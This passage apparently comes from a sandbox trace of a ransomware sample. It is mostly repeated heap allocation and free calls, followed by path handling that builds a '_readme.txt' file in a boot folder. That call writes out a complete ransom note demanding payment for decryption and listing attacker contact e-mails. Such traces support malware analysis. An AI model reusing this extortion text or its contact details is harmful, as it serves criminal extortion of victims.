0x9c5d1d0 [0056.238] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.238] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.238] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.238] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0056.238] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.238] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.238] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.239] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.239] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x322cda8 [0056.239] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.239] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.239] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.239] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.239] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.239] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.239] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.239] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.239] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0056.239] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.239] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.239] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.239] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.239] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.239] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.239] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.239] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.239] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.239] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.239] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.239] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.239] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.239] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.239] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.239] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.239] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.239] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.239] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.239] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0056.239] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.240] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.240] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.240] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0056.240] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.240] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.240] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.240] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.240] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.240] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.240] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.240] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.240] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.240] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.240] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.240] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.240] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.240] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.240] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.240] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.240] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.240] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.240] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.240] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.240] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.240] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.240] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.240] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.240] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.240] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.240] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.240] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.241] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.241] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.241] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.241] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.241] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x322cda8 [0056.241] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.241] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.241] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.241] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.241] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.241] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.241] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.241] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.241] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.241] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x322cda8 [0056.241] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.241] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.241] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.241] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.241] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.241] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.241] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.241] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.241] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.241] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.241] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.241] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.241] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.241] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.241] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.241] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.241] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.242] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.242] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.242] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.242] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.242] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x322cda8 [0056.242] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.242] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.242] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.242] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.242] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0056.242] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.242] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.242] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.242] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0056.242] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.242] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.242] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.242] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.242] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.242] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.242] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.242] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.242] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.242] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.242] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.242] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.242] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.242] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.242] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.242] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.242] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.242] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.242] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.243] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.243] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.243] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.243] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.243] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.243] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.243] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.243] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.243] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.243] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.243] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.243] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.243] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.243] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x322cda8 [0056.243] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.243] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.243] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.243] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.243] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.243] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.243] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.243] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.243] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.243] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.243] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.243] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.243] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.243] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.243] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.243] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.243] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.243] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.244] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.244] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.244] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.244] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.244] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.244] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.244] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.244] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x322cda8 [0056.244] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.244] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.244] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.244] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.244] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0056.244] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.244] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.244] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.244] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0056.244] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.244] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.244] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.244] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.244] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.244] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.244] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.244] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.244] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.244] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.244] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.244] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.244] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.244] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.245] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.245] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.245] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.245] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.245] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.245] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.245] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.245] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.245] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.245] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.245] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.245] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.245] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.245] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.245] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.245] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.245] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.245] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.245] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x322cda8 [0056.245] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.245] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.245] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.245] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.245] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.245] PathFindFileNameW (pszPath="C:\\Boot\\ko-KR\\") returned="ko-KR\\" [0056.245] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.245] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0056.245] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0056.245] PathFindFileNameW (pszPath="") returned="" [0056.246] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.246] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75fd0000 [0056.246] GetProcAddress (hModule=0x75fd0000, lpProcName="SHGetFolderPathW") returned 0x76055708 [0056.246] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x800) returned 0x3297a68 [0056.246] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3297a68 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0056.246] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x810) returned 0x9c5d1d0 [0056.246] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.246] FreeLibrary (hLibModule=0x75fd0000) returned 1 [0056.246] PathAppendW (in: pszPath="C:\\Boot\\ko-KR\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\ko-KR\\_readme.txt") returned 1 [0056.246] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.246] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.246] PathFileExistsW (pszPath="C:\\Boot\\ko-KR\\_readme.txt") returned 0 [0056.247] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x7d00) returned 0x9c82710 [0056.247] lstrcpyW (in: lpString1=0x9c82710, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6s" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC 